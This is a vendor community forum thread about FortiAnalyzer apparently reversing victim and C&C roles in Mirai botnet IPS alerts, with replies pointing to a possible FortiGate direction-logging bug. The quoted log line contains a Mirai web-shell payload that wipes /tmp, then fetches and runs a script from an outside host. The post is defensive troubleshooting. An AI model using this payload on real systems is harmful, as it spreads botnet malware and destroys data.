From time to time our FortiGate is logging botnet activity. When I look at the lines in our syslog server the traffic is listed as incoming from external hosts into our servers in DMZ. The lines show attempts to install and execute a script in e.g. /tmp, and shortly after the same external host tries to contact the same DMZ server through port 80. The log lines might look something like this;
2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 time=21:52:04 devname="??????" devid="FGT2KETBXXXXXXXX" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" eventtime=1627933925055431525 tz="+0200" severity="high" srcip=64.17.27.51 srccountry="United States"dstip=10.10.91.89 srcintf="Ytre-aggr" srcintfrole="wan" dstintf="DMZ-1-2" dstintfrole="undefined" sessionid=2238099031 action="dropped" proto=6 service="HTTP" policyid=237 attack="Mirai.Botnet" srcport=37935 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 209.141.41.11/jaws;sh+/tmp/jaws" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=721445630 msg="backdoor: Mirai.Botnet," crscore=30 craction=8192 crlevel="high"
My interpretation of this is an attempt to infect our server – in other words we are the victim, and the external host is the attacker.
Our FortiGate is logging to a FortiAnalyzer at the same time as the syslog server, and after running the log through FortiAnalyzer this is reported the other way around. The external hosts are listed as “Victims” and our servers as “C&C”.
Why is FortiAnalyzer turning this around, and why is it written; direction="outgoing" in the log line ? Perhaps I have misunderstood the consept, and our servers are indeed infected ?
In addition to this all botnet activity is being dropped by the firewall so it really never reaches our DMZ server. Why is that not shown in the report ?
Regards
bhb1958
We currently have a customer seeing similar logs with the victim being and external IP.
Hey david,
sorry to hear of your issues.
Can you let me know the firmware version of your FortiGate(s)? There was a known issue a while back about FortiGate logging the attack direction incorrectly, which could lead to FortiAnalyzer interpreting source and destinatinon (and thus victim and C&C server) incorrectly.
Hey Debbie,
I confirm the same behavior with our customers in C&C Botnet detection through different versions of FortiOs and FAZ.
FGT version 6.4.9, 7.0.6, 7.2.1
FAZ version 7.0.4, 7.2.1
Jirka
Hey Jirka,
those are fairly recent firmware versions, so they should not be affected by the issue I mentioned, at least to my knowledge.
I would suggest a ticket with FortiGate and/or FortiAnalyzer team regarding this:
-> FortiGate likely reports the attack direction incorrectly
-> this causes FortiAnalyzer to report victim and C&C server incorrectly
The underlying issue is on FortiGate side, but FortiAnalyzer team does usually deal with at least some logging-related stuff on FortiGate side, so I'm not entirely sure which team woudl be the better fit.
A detailed explanation (with FortiAnalyzer report, raw log messagess, FortiGate config and network overview showing that the supposed C&C servers are actually internal servers and the victims) in the ticket would help the assigned engineers figure out who can best assist you in resolving this.
This is an 1801F running 6.4.10, so again a recent version.
The FAZVM is running v7.0.3-build0245 220202
Hey david,
same as I replied to Jirka - I would suggest a ticket with Technical Support to dig further into it.
Select Forum Responses to become Knowledge Articles!
Select the “Nominate to Knowledge Base” button to recommend a forum post to become a knowledge article.
User | Count |
---|---|
1740 | |
1108 | |
752 | |
447 | |
240 |
The Fortinet Security Fabric brings together the concepts of convergence and consolidation to provide comprehensive cybersecurity protection for all users, devices, and applications and across all network edges.
Copyright 2024 Fortinet, Inc. All Rights Reserved.